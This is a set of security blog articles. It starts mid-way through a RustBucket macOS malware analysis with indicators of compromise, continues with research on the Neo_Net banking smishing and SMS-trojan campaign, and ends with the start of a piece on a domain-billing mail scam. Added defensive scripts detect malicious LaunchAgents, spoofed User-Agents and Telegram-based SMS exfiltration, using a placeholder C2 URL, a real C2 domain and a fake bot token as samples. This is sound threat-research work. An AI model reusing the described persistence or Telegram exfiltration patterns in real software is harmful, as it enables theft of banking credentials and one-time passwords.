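    # Stage 3 takes its C2 as a launch parameter, so a URL among the arguments is notable.
    for arg in args[1:]:
        parts = urlsplit(arg)
        if parts.scheme in ("http", "https") and parts.netloc:
            findings.append(f"URL passed as launch argument: {arg!r}")
    return findings


def scan_launch_agents(directory: Path | None = None) -> dict[str, list[str]]:
    """Triage every plist in a LaunchAgents directory; returns {path: findings}."""
    directory = directory or Path.home() / "Library" / "LaunchAgents"
    results: dict[str, list[str]] = {}
    for plist_file in sorted(directory.glob("*.plist")):
        try:
            findings = triage_launch_agent(plist_file.read_bytes(), str(plist_file))
        except Exception as exc:  # a plist launchd cannot parse is itself worth a look
            findings = [f"could not parse: {exc}"]
        if findings:
            results[str(plist_file)] = findings
    return results


# Constructed sample mirroring the paths the post reports; the URL is a placeholder.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.systemupdate</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/victim/Library/Metadata/System Update</string>
    <string>https://c2.example.invalid/</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""
SAMPLE_PATH = "/Users/victim/Library/LaunchAgents/com.apple.systemupdate.plist"

if __name__ == "__main__":
    for finding in triage_launch_agent(SAMPLE_PLIST, SAMPLE_PATH):
        print("sample:", finding)
    for path, findings in scan_launch_agents().items():
        print(path, *findings, sep="\n  ")
```

Run on a live system the script prints only agents with findings; the sample plist trips three of the four checks. The Label check is deliberately narrow (Apple namespace plus a non-system executable) so that legitimately installed third-party agents under ~/Library/LaunchAgents do not drown the result.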

Much of the malware functionality found in variant A’s webT methods is, in variant B, buried in the massive sym.updator::main function. This is responsible for surveilling the environment, parsing the arguments received at launch, processing commands, gathering disk information and more. The function is over 22KB in size and contains 501 basic blocks. Our analysis of it is ongoing, but aside from the functions previously described by Elastic, it also gathers disk information, including whether the host device’s disk is an SSD or the older rotational-platter type.

Among updator::main’s many tasks is gathering disk information

After gathering environmental information, the malware calls sym.updator::send_request to post the data to the C2 using the following User Agent string (this time not in lowercase):

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

The malware compares the response against two hardcoded values, 0x31 and 0x30 (the ASCII characters “1” and “0”).

Checking the values of the response from the C2

In the sample analyzed by Elastic, the researchers reported that 0x31 causes the malware to self-terminate while 0x30 allows the operator to drop a further payload in the _CS_DARWIN_USER_TEMP directory.
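
The User-Agent is a cheap but useful hunting lead: a Mac claiming to be Internet Explorer 8 on Windows XP is a platform mismatch regardless of whether the exact string is known. The script below is an added example, not part of the post; it parses squid-style proxy lines (constructed here, with the C2 domain taken from the IoC list) and compares the platform each User-Agent claims against an asset inventory, flagging mismatches and marking the ones that match RustBucket's string (case-insensitively, since earlier stages send it lowercased).

```python
from __future__ import annotations

import re

RUSTBUCKET_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"

# Platform tokens as they appear in User-Agent strings, mapped to inventory OS names.
# Order matters: iPhone UAs also say "like Mac OS X", Android UAs also say "Linux".
PLATFORM_TOKENS = [
    (re.compile(r"windows nt", re.I), "Windows"),
    (re.compile(r"iphone|ipad", re.I), "iOS"),
    (re.compile(r"android", re.I), "Android"),
    (re.compile(r"macintosh|mac os x", re.I), "macOS"),
    (re.compile(r"linux", re.I), "Linux"),
]


def claimed_platform(user_agent: str) -> str | None:
    """Platform a User-Agent string claims, or None for tools that state none."""
    for pattern, name in PLATFORM_TOKENS:
        if pattern.search(user_agent):
            return name
    return None


# Constructed log format: time client method url status "user-agent"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
1689000001.123 10.0.0.21 POST http://cloud.dnx.capital/ 200 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
1689000002.456 10.0.0.21 GET https://www.apple.com/ 200 "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15"
1689000003.789 10.0.0.42 GET https://example.com/ 200 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
1689000004.000 10.0.0.77 GET https://example.com/ 200 "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1"
"""

# Constructed stand-in for an asset inventory: client IP -> operating system.
SAMPLE_INVENTORY = {"10.0.0.21": "macOS", "10.0.0.42": "Windows", "10.0.0.77": "iOS"}


def find_platform_mismatches(log_text: str, inventory: dict[str, str]) -> list[dict]:
    """Requests whose User-Agent claims a platform other than the client's inventoried OS."""
    hits: list[dict] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ua = m["ua"]
        claimed = claimed_platform(ua)
        actual = inventory.get(m["client"])
        # Unknown clients and UAs with no platform claim are left to other detections.
        if claimed is None or actual is None or claimed == actual:
            continue
        hits.append({
            "client": m["client"],
            "url": m["url"],
            "claimed": claimed,
            "actual": actual,
            "known_rustbucket_ua": ua.lower() == RUSTBUCKET_UA.lower(),
        })
    return hits


if __name__ == "__main__":
    for hit in find_platform_mismatches(SAMPLE_LOG, SAMPLE_INVENTORY):
        print(hit)
```

Only the first sample line is reported: the Windows host sending the same IE8 string is consistent with its inventory, so the string alone is not the signal; the mismatch is. Legitimate mismatches exist (virtual machines, compatibility modes, some apps' embedded browsers), so treat a hit as a pivot into process and persistence data rather than a verdict.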

The choice of Rust and the complexity of the Stage 3 binaries suggest the threat actor was willing to invest considerable effort to thwart analysis of the payload. As the known C2s were unresponsive by the time we conducted our analysis, we were unable to obtain a sample of the next stage of the malware, but already at this point in the operation the malware has gathered a great deal of host information, enabled persistence and opened up a backdoor for further malicious activity.

SentinelOne Protects Against RustBucket Malware

SentinelOne Singularity protects customers from known components of the RustBucket malware. Attempts to install persistence mechanisms on macOS devices are also dynamically detected and blocked by the agent.

SentinelOne Agent User Interface detects RustBucket malware
SentinelOne Singularity Console detects RustBucket malware

Conclusion

The RustBucket campaign highlights that the threat actor, whom previous researchers have confidently attributed to DPRK’s BlueNoroff APT, has invested considerable resources in multi-stage malware aimed specifically at macOS users and is evolving its attempts to thwart analysis by security researchers.

The extensive effort made to evade analysis and detection shows in itself that the threat actor is aware of the growing adoption of security software by organizations with macOS devices in their fleets, as security teams have increasingly come to see the need for better protection than is provided out of the box. SentinelOne continues to track the RustBucket campaign and our analysis of the known payloads is ongoing.

To see how SentinelOne can help safeguard your organization’s macOS devices, contact us for more information or request a free demo.

Indicators of Compromise

Stage 2 Mach-Os

SHA1 Arch Lang
0df7e1d3b3d54336d986574441778c827ff84bf2 FAT objc
27b101707b958139c32388eb4fd79fcd133ed880 ARM objc
338af1d91b846f2238d5a518f951050f90693488 ARM objc
5304031dc990790a26184b05b3019b2c5fa7022a FAT swift
72167ec09d62cdfb04698c3f96a6131dceb24a9c ARM objc
7f9694b46227a8ebc67745e533bc0c5f38fdfa59 ARM objc
963a86aab1e450b03d51628797572fe9da8410a2 FAT objc
9676f0758c8e8d0e0d203c75b922bcd0aeaa0873 FAT objc
a7f5bf893efa3f6b489efe24195c05ff87585fe3 ARM swift
ac08406818bbf4fe24ea04bfd72f747c89174bdb x86 objc
acf1b5b47789badb519ff60dc93afa9e43bbb376 x86 swift
b02922869e86ad06ff6380e8ec0be8db38f5002b x86 objc
d5971e8a3e8577dbb6f5a9aad248c842a33e7a26 x86 objc
e0e42ac374443500c236721341612865cd3d1eec FAT objc
ed4f16b36bc47a701814b63e30d8ea7a226ca906 FAT swift
fd1cef5abe3e0c275671916a1f3a566f13489416 x86 objc

Stage 3 Version A Mach-Os

SHA1 Arch Lang
182760cbe11fa0316abfb8b7b00b63f83159f5aa FAT rust
3cc19cef767dee93588525c74fe9c1f1bf6f8007 ARM rust
831dc7bc4a234907d94a889bcb60b7bedf1a1e13 x86 rust
8e7b4a0d9a73ec891edf5b2839602ccab4af5bdf x86 rust

Stage 3 Version B Mach-Os

SHA1 Arch Lang
69f24956fb75beb9b93ef974d873914500e35601 ARM rust
8a1b32ab8c2a889985e530425ae00f4428c575cc FAT rust
b74702c9b82f23ebf76805f1853bc72236bee57c FAT rust
cd8f41b91e8f1d8625e076f0a161e46e32c62bbf x86 rust

Malicious PDFs

SHA1 Name
469236d0054a270e117a2621f70f2a494e7fb823 DOJ Report on Bizlato Investigation.pdf
574bbb76ef147b95dfdf11069aaaa90df968e542 Readme.pdf
7e69cb4f9c37fad13de85e91b5a05a816d14f490 InvestmentStrategy(Protected).pdf
7f8f43326f1ce505a8cd9f469a2ded81fa5c81be Jump Crypto Investment Agreement.pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc DOJ Report on Bizlato Investigation_asistant.pdf
e7158bb75adf27262ec3b0f2ca73c802a6222379 Daiwa Ventures.pdf

Stage 1 Applications (.zip)

0738687206a88ecbee176e05e0518effa4ca4166
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
5933f1a20117d48985b60b10b5e42416ac00e018
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa
7e1870a5b24c78a5e357568969aae3a5e7ab857d
89301dfdc5361f1650796fecdac30b7d86c65122
9121509d674091ce1f5f30e9a372b5dcf9bcd257
9a5f6a641cc170435f52c6a759709a62ad5757c7
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0
ca59874172660e6180af2815c3a42c85169aa0b2
d9f1392fb7ed010a0ecc4f819782c179efde9687
e2bcdfbda85c55a4d6070c18723ba4adb7631807

AppleScript main.scpt
dabb4372050264f389b8adcf239366860662ac52

Communications
cloud[.]dnx.capital
crypto.hondchain[.]com

File Paths

$TMPDIR/ErrorCheck.zip
/Users/Shared/1.zip
/Users/Shared/Internal PDF Viewer.app
/Users/Shared/.pd
~/Library/Metadata/System Update
~/Library/LaunchAgents/com.apple.systemupdate.plist

Neo_Net | The Kingpin of Spanish eCrime

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post marks the start of a series highlighting the best entries, beginning with the winner from Pol Thill.

This in-depth and meticulous research into a cybercrime threat actor targeting thousands of clients of financial institutions makes a significant contribution to our understanding of the cybersecurity landscape and is the worthy winner of our challenge.

Executive Summary

  • Neo_Net has been conducting an eCrime campaign targeting clients of prominent banks globally, with a focus on Spanish and Chilean banks, from June 2021 to April 2023.
  • Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims’ bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims.
  • The campaign employs a multi-stage attack strategy, starting with targeted SMS phishing messages distributed across Spain and other countries, using Sender IDs (SIDs) to create an illusion of authenticity and mimicking reputable financial institutions to deceive victims.
  • Neo_Net has established and rented out a wide-ranging infrastructure, including phishing panels and Android trojans, to multiple affiliates, sold compromised victim data to third parties, and launched a successful Smishing-as-a-Service offering targeting various countries worldwide.

Introduction

An extensive eCrime campaign has been observed targeting clients of prominent banks around the world from June 2021 to April 2023. Notably, the threat actors have predominantly focused on Spanish and Chilean banks, with 30 out of 50 targeted financial institutions headquartered in Spain or Chile, including major banks such as Santander, BBVA and CaixaBank. Banks targeted in other regions include Deutsche Bank, Crédit Agricole and ING. A complete list can be found in Appendix A at the end of this post.

Despite employing relatively unsophisticated tools, the threat actors have achieved a high success rate by tailoring their infrastructure to their specific targets. The campaign has resulted in the theft of over 350,000 EUR from victims’ bank accounts, along with the compromise of a significant amount of Personally Identifiable Information (PII), including telephone numbers, national identity numbers, and names from thousands of victims.

The mastermind behind this operation, known as Neo_Net, has established and rented out a wide-ranging infrastructure, including phishing panels, Smishing software, and Android trojans to multiple affiliates, sold compromised victim data to interested third parties, and has even launched a successful Smishing-as-a-Service offering that targets various countries worldwide. This report will provide a detailed overview of the campaign and delve into the background of Neo_Net, shedding light on his operations over the years.

Fig 1: Countries targeted by Neo_Net

eCrime Campaign against Financial Institutions

The campaign employed a sophisticated multi-stage attack strategy that commenced with targeted SMS phishing messages distributed across Spain using Neo_Net’s proprietary service, Ankarex. These messages leveraged Sender IDs (SIDs) to create an illusion of authenticity, mimicking reputable financial institutions in an attempt to deceive the victims.

Fig 2: Demonstration of Ankarex’s SID functionality in the Ankarex News Channel

The SMS messages employed various scare tactics, such as claiming that the victim’s account had been accessed by an unauthorized device or that their card had been temporarily limited due to security concerns. The messages also contained a hyperlink to the threat actor’s phishing page.

The phishing pages were meticulously set up using Neo_Net’s panels, PRIV8, and implemented multiple defense measures, including blocking requests from non-mobile user agents and concealing the pages from bots and network scanners. These pages were designed to closely resemble genuine banking applications, complete with animations to create a convincing façade:

Fig 3: BBVA and Santander phishing pages

Upon submission of their credentials, the victims’ information was surreptitiously exfiltrated to a designated Telegram chat via the Telegram Bot API, granting the threat actors unrestricted access to the stolen data, including the victims’ IP addresses and user agents.

Fig 4: Neo_Net’s affiliates discussing captured credentials and the corresponding bank account

Subsequently, the threat actors employed various techniques to circumvent the Multi-Factor Authentication (MFA) mechanisms commonly employed by banking applications. One such approach involved coaxing victims into installing a purported security application for their bank account on their Android devices.

Fig 5: Android application impersonating ING

However, this application served no legitimate security purpose and merely requested permissions to send and view SMS messages.

Fig 6: BBVA application showing the SMS permission request after victim clicks on “Actualizar” button

In reality, these Android trojans functioned as modified versions of the publicly available Android SMS spyware known as SMS Eye. Some threat actors further obfuscated the trojan using public packers to evade detection by anti-malware solutions. These Android trojans covertly exfiltrated incoming SMS messages to a distinct dedicated Telegram chat.

Fig 7: Telegram messages showing exfiltrated BBVA OTPs

The exfiltrated messages could then be utilized to bypass MFA on the targeted accounts by capturing One-Time Passwords (OTPs). Additionally, the threat actors were also observed employing direct phone calls to victims, possibly to impersonate bank representatives and deceive victims into installing the Android spyware or divulging OTPs.
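
The capability described above is small enough to spot statically: an app that asks for SMS permissions, registers a receiver for incoming SMS, and carries a Telegram Bot API endpoint in its strings has everything an SMS Eye-style stealer needs and little else. The triage script below is an added example, not Neo_Net's or SentinelOne's code. It takes the decoded AndroidManifest.xml and a strings dump of the kind apktool or a similar unpacker produces; both inputs are constructed here (the package name is the one from the IoC table, the bot token is fake), and the token regex is an assumption about the format Telegram bot tokens normally take.

```python
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
}
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"

# Assumed token shape: <numeric bot id>:<35 URL-safe characters>. The API is reached at
# api.telegram.org/bot<token>/<method>, so the token sits directly after "bot" in a URL.
TELEGRAM_TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
TELEGRAM_API_RE = re.compile(
    r"""https?://api\.telegram\.org/bot[^/\s"']+/(?:sendMessage|sendDocument|getUpdates)"""
)
CHAT_ID_RE = re.compile(r"chat_id=(-?\d{6,})")


def manifest_sms_capability(manifest_xml: str) -> dict:
    """SMS permissions requested and receivers listening for SMS_RECEIVED."""
    root = ET.fromstring(manifest_xml)
    perms = {el.get(f"{ANDROID_NS}name") for el in root.iter("uses-permission")} & SMS_PERMISSIONS
    receivers = []
    for receiver in root.iter("receiver"):
        for action in receiver.iter("action"):
            if action.get(f"{ANDROID_NS}name") == SMS_RECEIVED_ACTION:
                receivers.append(receiver.get(f"{ANDROID_NS}name"))
    return {
        "package": root.get("package"),
        "sms_permissions": sorted(perms),
        "sms_receivers": receivers,
    }


def telegram_exfil_indicators(strings_dump: str) -> dict:
    """Bot tokens, API endpoints and chat IDs embedded in the app's strings."""
    return {
        "bot_tokens": sorted(set(TELEGRAM_TOKEN_RE.findall(strings_dump))),
        "api_endpoints": sorted({m.group(0) for m in TELEGRAM_API_RE.finditer(strings_dump)}),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(strings_dump))),
    }


def triage(manifest_xml: str, strings_dump: str) -> dict:
    """Combine both views; the verdict needs an SMS receiver plus a Telegram channel."""
    caps = manifest_sms_capability(manifest_xml)
    exfil = telegram_exfil_indicators(strings_dump)
    verdict = bool(caps["sms_receivers"]) and bool(exfil["bot_tokens"] or exfil["api_endpoints"])
    return {**caps, **exfil, "likely_sms_stealer": verdict}


# Constructed manifest: SMS permissions, a high-priority SMS receiver, a lure activity.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.neonet.app.reader">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Seguridad">
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <receiver android:name=".SmsReceiver" android:exported="true">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed strings dump; the token is fake and the chat ID is invented.
SAMPLE_STRINGS = """\
Build.MODEL
https://api.telegram.org/bot1234567890:AAHFakeTokenFakeTokenFakeTokenFake1/sendMessage?chat_id=-1001234567890&text=
SMS_RECEIVED
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_MANIFEST, SAMPLE_STRINGS).items():
        print(f"{key}: {value}")
```

A recovered token and chat ID are worth more than the verdict: the token identifies the bot to report to Telegram, and the chat ID ties samples from different affiliates to the same exfiltration channel, which is how the post links the trojans back to Neo_Net as channel administrator. Packed samples (see the MITRE table in Appendix C) will show nothing in their strings until the dropped dex is unpacked, so run this on the unpacked payload.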

The threat actors employed this method to target clients of several prominent banks around the world.

The funds illicitly acquired from victims during the course of the year-long operation amounted to a minimum of 350,000 EUR. However, it is probable that the actual sum is significantly higher, as older operations and transactions that do not involve SMS confirmation messages may not be fully accounted for due to limited visibility.

Neo_Net

Neo_Net, the prominent actor responsible for the global cybercrime campaign, has been active since at least early 2021. He maintains a public GitHub profile under the name “notsafety” and a Telegram account that showcases his work and identifies him as the founder of Ankarex, a Smishing-as-a-Service platform.

Fig 8: Neo_Net’s Telegram profile

Through his contributions on Telegram, Neo_Net has been linked to the “macosfera.com” forum, a Spanish-language IT forum. Email addresses registered with the forum’s domain were found in relation to several phishing panels created by Neo_Net, targeting Spanish banks and other institutions. These email addresses were used as usernames for the panels, suggesting that Neo_Net may have collaborated with individuals from this forum to set up his infrastructure. The phishing panels also clearly indicate Neo_Net as the creator, with his signature on top of the php files.

Fig 9: Phishing panels with links to macosfera[.]com (VirusTotal)

Ankarex

Neo_Net’s main creation is the Ankarex Smishing-as-a-Service platform, which has been active since at least May 2022. The Ankarex News Channel on Telegram, which advertises the service, currently has 1700 subscribers and regularly posts updates about the software, as well as limited offers and giveaways.

Fig 10: Halloween offer for 15% extra funds when recharging the account

The service itself is accessible at ankarex[.]net, and once registered, users can upload funds using cryptocurrency transfers and launch their own Smishing campaigns by specifying the SMS content and target phone numbers. Ankarex currently targets 9 countries but has historically operated in additional regions.

Fig 11: Ankarex target countries and prices list

In addition to the Smishing service, Neo_Net has also offered leads, including victims’ names, email addresses, IBANs, and phone numbers for sale on the Ankarex Channel. He has also advertised his Android SMS spyware service to selected members. Notably, every channel created to exfiltrate the captured SMS messages has Neo_Net listed as an administrator, and several package names of the Android trojans allude to their creator with names such as com.neonet.app.reader. It is likely that Neo_Net rented his infrastructure to affiliates, some of whom have been observed working with him on multiple unique campaigns, allowing them to conduct phishing and funds transfers independently.

Fig 12: Neo_Net demonstrating Ankarex on his own phone and exhibiting remarkable OPSEC throughout his campaigns

Throughout his year-long operation, Neo_Net has been traced back to several unique IP addresses, indicating that he currently resides in Mexico. Neo_Net primarily operates in Spanish-speaking countries and communicates predominantly in Spanish with his affiliates. Communication in the Ankarex channel is almost exclusively done in Spanish.

However, Neo_Net has also been observed collaborating with non-Spanish speakers, including another cybercriminal identified by the Telegram handle devilteam666. This particular operation involved the use of Google Ads targeting crypto wallet owners, and devilteam666 continues to offer malicious Google Ads services on his Telegram channel.

Conclusion

Despite employing mostly unsophisticated tools and techniques, such as simple SMS spyware and phishing panels, Neo_Net and his affiliates have managed to steal hundreds of thousands of euros and compromise the personally identifiable information (PII) of thousands of victims worldwide. The success of their campaigns can be attributed to the highly targeted nature of their operations, often focusing on a single bank, and copying their communications to impersonate bank agents. Furthermore, due to the simplicity of SMS spyware, it can be difficult to detect, as it only requires permission to send and view SMS messages.

Neo_Net has also been observed reusing compromised PII for further profit. A significant amount of eCrime against mobile users in Spain over the past two years can be directly traced back to Neo_Net’s operation, including his phishing panels, Smishing-as-a-Service platform, and Android trojans.

These campaigns highlight that while Multi-Factor Authentication is robust, it can be circumvented if it relies on SMS, and that physical tokens or external applications would provide better protection in such cases.

Acknowledgments

Special thanks go to @malwrhunterteam who posted about several samples used in this campaign on his Twitter account.

Appendix A: Targeted Financial Institutions

  • Spain: Santander, BBVA, CaixaBank, Sabadell, ING España, Unicaja, Kutxabank, Bankinter, Abanca, Laboral Kutxa, Ibercaja, BancaMarch, CajaSur, OpenBank, Grupo Caja Rural, Cajalmendralejo, MoneyGo, Cecabank, Cetelem, Colonya, Self Bank, Banca Pueyo
  • France: Crédit Agricole, Caisse d’Epargne, La Banque postale, Boursorama, Banque de Bretagne
  • Greece: National Bank of Greece
  • Germany: Sparkasse, Deutsche Bank, Commerzbank
  • United Kingdom: Santander UK
  • Austria: BAWAG P.S.K.
  • Netherlands: ING
  • Poland: PKO Bank Polski
  • Chile: BancoEstado, Scotiabank (Cencosud Scotiabank), Santander (officebanking), Banco Ripley, Banco de Chile, Banco Falabella, Banco de Crédito e Inversiones, Itaú CorpBanca
  • Colombia: Bancolombia
  • Venezuela: Banco de Venezuela
  • Peru: BBVA Peru
  • Ecuador: Banco Pichincha
  • Panama: Zinli
  • USA: Prosperity Bank, Greater Nevada Credit Union
  • Australia: CommBank

Appendix B

Indicators of Compromise

APK SHA1 Hashes Main Activity Name Impersonated Institution
de8929c1a0273d0ed0dc3fc55058e0cb19486b3c com.neonet.app.reader.MainActivity BBVA
b344fe1bbb477713016d41d996c0772a308a5146 com.neonet.app.reader.MainActivity Laboral Kutxa
8a099af61f1fa692f45538750d42aab640167fd2 com.neonet.app.reader.MainActivity Correos
ab14161e243d478dac7a83086ed4839f8ad7ded8 com.neonet.app.reader.MainActivity BBVA
ded2655512de7d3468f63f9487e16a0bd17818ff com.neonet.app.reader.MainActivity CaixaBank
a5208de82def52b4019a6d3a8da9e14a13bc2c43 com.neonet.app.reader.MainActivity CaixaBank
21112c1955d131fa6cab617a3d7265acfab783c2 com.neonet.app.reader.MainActivity Openbank
6ea53a65fe3a1551988c6134db808e622787e7f9 com.neonet.app.reader.MainActivity Unicaja
62236a501e11d5fbfe411d841caf5f2253c150b8 com.neonet.app.reader.MainActivity BBVA
7f0c3fdbfcdfc24c2da8aa3c52aa13f9b9cdda84 com.neonet.app.reader.MainActivity BBVA
f918a6ecba56df298ae635a6a0f008607b0420b9 com.neonet.app.reader.MainActivity Santander
ffbcdf915916595b96f627df410722cee5b83f13 com.neonet.app.reader.MainActivity BBVA
7b4ab7b2ead7e004c0d93fe916af39c156e0bc61 com.neonet.app.reader.MainActivity CajaSur
34d0faea99d94d3923d0b9e36ef9e0c48158e7a0 com.neonet.app.reader.MainActivity BBVA
e6c485551d4f209a0b7b1fa9aa78b7efb51be49b com.neonet.app.reader.MainActivity BBVA
1df3ed2e2957efbd1d87aac0c25a3577318b8e2a com.neonet.app.reader.MainActivity BBVA
6a907b8e5580a5067d9fb47ef21826f164f68f3f com.neonet.app.reader.MainActivity Grupo Caja Rural
5d1c7ff3d16ec770cf23a4d82a91358b9142d21a com.neonet.app.reader.MainActivity Grupo Caja Rural
86ad0123fa20b7c0efb6fe8afaa6a756a86c9836 com.neonet.app.reader.MainActivity Grupo Caja Rural
14a36f18a45348ad9efe43b20d049f3345735163 com.neonet.app.reader.MainActivity Cajalmendralejo
b506503bb71f411bb34ec8124ed26ae27a4834b9 com.neonet.app.reader.MainActivity BBVA
afe84fa17373ec187781f72c330dfb7bb3a42483 com.cannav.cuasimodo.jumper.actividades BBVA
445468cd5c298f0393f19b92b802cfa0f76c32d4 com.cannav.cuasimodo.jumper.actividades BBVA
8491ff15ad27b90786585b06f81a3938d5a61b39 com.cannav.cuasimodo.jumper.actividades BBVA
2714e0744ad788142990696f856c5ffbc7173cf4 com.cannav.cuasimodo.jumper.actividades BBVA
1ce0afe5e09b14f8aee6715a768329660e95121e com.cannav.cuasimodo.jumper.actividades BBVA
96a3600055c63576be9f7dc97c5b25f1272edd2b com.cannav.cuasimodo.jumper.actividades BBVA
9954ae7d31ea65cd6b8cbdb396e7b99b0cf833f4 com.cannav.cuasimodo.jumper.actividades BBVA
07159f46a8adde95f541a123f2dda6c49035aad1 com.cannav.cuasimodo.jumper.actividades BBVA
ab19a95ef3adcb83be76b95eb7e7c557812ad2f4 com.cannav.cuasimodo.jumper.actividades BBVA
db8eeab4ab2e2e74a34c47ad297039485ff75f22 com.cannav.cuasimodo.jumper.actividades BBVA
dbf0cec18caabeb11387f7e6d14df54c808e441d com.cannav.cuasimodo.jumper.actividades BBVA
69d38eed5dc89a7b54036cc7dcf7b96fd000eb92 com.cannav.cuasimodo.jumper.actividades BBVA
c38107addc00e2a2f5dcb6ea0cbce40400c23b49 com.cannav.cuasimodo.jumper.actividades BBVA
279048e07c25fd75c4cef7c64d1ae741e178b35b com.uklapon.mafin.chinpiling.actividades Bankinter
ef8c5d639390d9ba138ad9c2057524ff6e1398de BBVA
e7c2d0c80125909d85913dfb941bdc373d677326 ING
145bd67f94698cc5611484f46505b3dc825bd6cd BancoEstado

Phishing Domains

bbva.info-cliente[.]net
santander.esentregas[.]ga
bbva.esentregas[.]ga
correos.esentregas[.]ga

Appendix C: MITRE ATT&CK Tags

ID Technique Explanation
T1406.002 Obfuscated Files or Information: Software Packing Some APK files are packed and drop the unpacked dex file once executed
T1633.001 Virtualization/Sandbox Evasion: System Checks Some APK files have been modified and initially check for common sandbox names before unpacking
T1426 System Information Discovery The Sms Eye trojan collects the brand and model of the infected phone
T1636.004 Protected User Data: SMS Messages The Sms Eye trojan collects incoming SMS messages
T1437.001 Application Layer Protocol: Web Protocols The Sms Eye trojan exfiltrates SMS messages over HTTPS
T1481.003 Web Service: One-Way Communication The Sms Eye trojan uses the Telegram Bot API to exfiltrate SMS messages
T1521.002 Encrypted Channel: Asymmetric Cryptography The C2 channel is encrypted by TLS
T1646 Exfiltration Over C2 Channel The SMS messages are exfiltrated over the C2 channel

Who’s Behind the DomainNetworks Snail Mail Scam?

If you’ve ever owned a domain name, the chances are good that at some point you’ve received a snail mail letter which appears to be a bill for a domain or website-related services. In reality, these misleading missives try to trick people into paying for useless services they never ordered, don’t need, and probably will never receive. Here’s a look at the most recent incarnation of this scam — DomainNetworks — and some clues about who may be behind it.

The DomainNetworks mailer may reference a domain that is or was at one point registered to your name and address. Although the letter includes the words “marketing services” in the upper right corner, the rest of the missive is deceptively designed to look like a bill for services already rendered.

DomainNetworks claims that listing your domain with their promotion services will result in increased traffic to your site. This is a dubious claim for a company that appears to be a complete fabrication, as we’ll see in a moment. But happily, the proprietors of this enterprise were not so difficult to track down.

The website Domainnetworks[.]com says it is a business with a post office box in Hendersonville, N.C., and another address in Santa Fe, N.M. There are a few random, non-technology businesses tied to the phone number listed for the Hendersonville address, and the New Mexico address was used by several no-name web hosting companies.

However, there is little connected to these addresses and phone numbers that get us any closer to finding out who’s running Domainnetworks[.]com. And neither entity appears to be an active, official company in their supposed state of residence, at least according to each state’s Secretary of State database.

The Better Business Bureau listing for DomainNetworks gives it an “F” rating, and includes more than 100 reviews by people angry at receiving one of these scams via snail mail. Helpfully, the BBB says DomainNetworks previously operated under a different name: US Domain Authority LLC.

DomainNetworks has an “F” reputation with the Better Business Bureau.

Copies of snail mail scam letters from US Domain Authority posted online show that this entity used the domain usdomainauthority[.]com, registered in May 2022. The Usdomainauthority mailer also featured a Hendersonville, N.C. address, albeit at a different post office box.

Usdomainauthority[.]com is no longer online, and the site seems to have blocked its pages from being indexed by the Wayback Machine at archive.org. But searching on a long snippet of text from DomainNetworks[.]com about refund requests shows that this text was found on just one other active website, according to publicwww.com, a service that indexes the HTML code of existing websites and makes it searchable.

A deceptive snail mail solicitation from DomainNetwork’s previous iteration — US Domain Authority. Image: Joerussori.com

That other website is a domain registered in January 2023 called thedomainsvault[.]com, and its registration details are likewise hidden behind privacy services. Thedomainsvault’s “Frequently Asked Questions” page is quite similar to the one on the DomainNetworks website; both begin with the question of why the company is sending a mailer that looks like a bill for domain services.

Thedomainsvault[.]com includes no useful information about the entity or people who operate it; clicking the “Contact-us” link on the site brings up a page with placeholder Lorem Ipsum text, a contact form, and a phone number of 123456789.

However, searching passive DNS records at DomainTools.com for thedomainsvault[.]com shows that at some point whoever owns the domain instructed incoming email to be sent to ubsagency@gmail.com.

The first result that currently pops up when searching for “ubsagency” in Google is ubsagency[.]com, which says it belongs to a Las Vegas-based Search Engine Optimization (SEO) and digital marketing concern generically named both United Business Service and United Business Services. UBSagency’s website is hosted at the same Ann Arbor, Mich. based hosting firm (A2 Hosting Inc) as thedomainsvault[.]com.

